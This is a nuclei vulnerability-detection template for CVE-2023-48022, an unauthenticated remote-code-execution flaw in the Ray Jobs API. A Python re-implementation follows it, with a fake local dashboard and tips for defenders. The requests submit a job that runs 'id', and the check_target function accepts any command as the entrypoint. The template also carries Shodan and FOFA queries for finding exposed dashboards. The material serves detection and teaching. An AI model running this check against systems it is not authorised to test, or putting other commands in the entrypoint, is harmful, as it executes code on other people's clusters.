id: CVE-2023-48022

info:
  name: Anyscale Ray - Remote Code Execution
  author: riteshs4hu
  severity: critical
  description: |
    Anyscale Ray 2.6.3 and 2.8.0 contain a remote code execution vulnerability: the Jobs API served by the Ray Dashboard accepts job submissions without any authentication and runs the submitted `entrypoint` command on the cluster, so anyone who can reach the Dashboard API over the network can execute arbitrary commands.
  impact: |
    Unauthenticated attackers with network access to the Ray Dashboard API can execute arbitrary commands on the head node as the user running the Ray processes (commonly root in container deployments), leading to complete compromise of the cluster and of any credentials or data it holds.
  remediation: |
    The vendor's position (recorded in the NVD entry) is that Ray is not intended for use outside a strictly controlled network environment and that the unauthenticated Jobs API is working as designed, so no Ray release adds authentication to this endpoint and upgrading alone does not close the exposure. Keep the Dashboard off untrusted networks: bind it to localhost (the default for `ray start --dashboard-host`), firewall the dashboard port, and put an authenticating reverse proxy in front of it if remote access is required.
  reference:
    - https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
    - https://vulncheck.com/xdb/497d7fb3b118
    - https://github.com/jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022
    - https://vulncheck.com/xdb/d3bafad9c9f6
    - https://github.com/0x656565/CVE-2023-48022
    - https://nvd.nist.gov/vuln/detail/cve-2023-48022
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-48022
    cwe-id: CWE-78
    epss-score: 0.92192
    epss-percentile: 0.99728
  metadata:
    verified: true
    max-request: 3
    vendor: ray_project
    product: ray
    shodan-query:
      - http.favicon.hash:463802404
      - http.html:"ray dashboard"
    fofa-query:
      - icon_hash=463802404
      - body="ray dashboard"
  tags: cve,cve2023,rce,ray,anyscale,vkev,vuln

variables:
  jobid: "Job_{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /api/jobs/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "entrypoint": "id",
          "submission_id": "{{jobid}}"
        }

      - |
        # wait for 8 seconds before getting the logs
        GET / HTTP/1.1
        Host: {{Hostname}}
        {{wait_for(8)}}

      - |
        GET /api/jobs/{{jobid}}/logs HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "logs\":")'
          - 'contains(content_type, "application/json")'
          - 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)'
        condition: and
# digest: 4a0a004730450221008a4fa6a9c2b274bdaf216f6488e04cf1102078dbf91d8fd7bf58cf700048f4640220364e401c754edb81454d999fab1b079a5764ae4735426118c5bbef8ac84c864c:922c64590222798bb761d5b6d8e72950
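The three requests above (submit a job whose entrypoint is `id`, wait, fetch the job's logs) and the AND-ed matcher are easy to misread from a raw template, so here is the same check written out in Python. This is an added example, not part of the nuclei template, the nuclei project, or Ray; `FakeRayDashboard` is a constructed stand-in that mimics only the two Jobs API endpoints the template touches (unauthenticated `POST /api/jobs/` and `GET /api/jobs/<id>/logs`) so the flow can be exercised offline, and the canned `id` output it returns is likewise constructed. `check_target` is the part you would point at a real dashboard, and only with authorisation.

```python
"""Re-implementation of the CVE-2023-48022 nuclei check: submit a job,
wait, read its logs, and apply the template's matcher conditions.
Added example; the fake dashboard below is a constructed stand-in, not Ray."""
import json
import re
import secrets
import threading
import time
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Equivalent to the template's regex "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)":
# the output of `id`, e.g. "uid=0(root) gid=0(root) groups=0(root)".
ID_OUTPUT_RE = re.compile(r"uid=[0-9a-z()]+ gid=[0-9a-z()]+")


def build_submission(entrypoint="id", job_id=None):
    """Body for POST /api/jobs/, mirroring the template's first request.
    Returns (job_id, json_body); job_id defaults to a random Job_xxxxxx."""
    job_id = job_id or "Job_" + secrets.token_hex(3)
    return job_id, json.dumps({"entrypoint": entrypoint, "submission_id": job_id})


def logs_indicate_rce(status, content_type, body):
    """The template's four matcher conditions, AND-ed, applied to the
    /api/jobs/<id>/logs response."""
    if status != 200 or "application/json" not in content_type:
        return False
    if 'logs":' not in body:          # contains(body, "logs\":")
        return False
    return ID_OUTPUT_RE.search(body) is not None


def check_target(base_url, entrypoint="id", wait_seconds=8.0):
    """Run the three-step check against base_url (e.g. http://host:8265).
    Returns (vulnerable, job_id). Only run against systems you own."""
    job_id, payload = build_submission(entrypoint)
    req = urllib.request.Request(
        f"{base_url}/api/jobs/", data=payload.encode(),
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        resp.read()
    time.sleep(wait_seconds)  # the template's {{wait_for(8)}}: let the job run
    try:
        with urllib.request.urlopen(f"{base_url}/api/jobs/{job_id}/logs", timeout=10) as resp:
            status, ctype, body = resp.status, resp.headers.get("Content-Type", ""), resp.read().decode()
    except urllib.error.HTTPError as err:  # 404 etc. still go through the matcher
        status, ctype, body = err.code, err.headers.get("Content-Type", ""), err.read().decode()
    return logs_indicate_rce(status, ctype, body), job_id


class FakeRayDashboard(BaseHTTPRequestHandler):
    """Constructed stand-in for a vulnerable dashboard: accepts any job with
    no authentication and reports canned `id` output as the job's logs."""
    jobs = {}

    def do_POST(self):
        n = int(self.headers.get("Content-Length", 0))
        sub = json.loads(self.rfile.read(n))
        # A real dashboard hands sub["entrypoint"] to a shell; this fake does not.
        self.jobs[sub["submission_id"]] = "uid=0(root) gid=0(root) groups=0(root)\n"
        self._json(200, {"submission_id": sub["submission_id"]})

    def do_GET(self):
        m = re.fullmatch(r"/api/jobs/([^/]+)/logs", self.path)
        if m and m.group(1) in self.jobs:
            self._json(200, {"logs": self.jobs[m.group(1)]})
        else:
            self._json(404, {"detail": "not found"})

    def _json(self, code, obj):
        data = json.dumps(obj).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo quiet
        pass


def run_against_fake_dashboard(wait_seconds=0.1):
    """Spin up the fake dashboard on a free port and run check_target on it."""
    srv = HTTPServer(("127.0.0.1", 0), FakeRayDashboard)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return check_target(f"http://127.0.0.1:{srv.server_address[1]}",
                            wait_seconds=wait_seconds)
    finally:
        srv.shutdown()


if __name__ == "__main__":
    vulnerable, job_id = run_against_fake_dashboard()
    print(f"{job_id}: {'vulnerable' if vulnerable else 'not vulnerable'}")
```

Two things the matcher logic makes visible: a 200 with JSON but no `uid=`/`gid=` in the logs (for example a job that is still pending or that failed) is reported as not vulnerable, which is why the template waits before reading the logs; and the `submission_id` is chosen by the client, so a defender reviewing dashboard logs can look for job IDs of the form `Job_` plus six random characters arriving from unexpected source addresses.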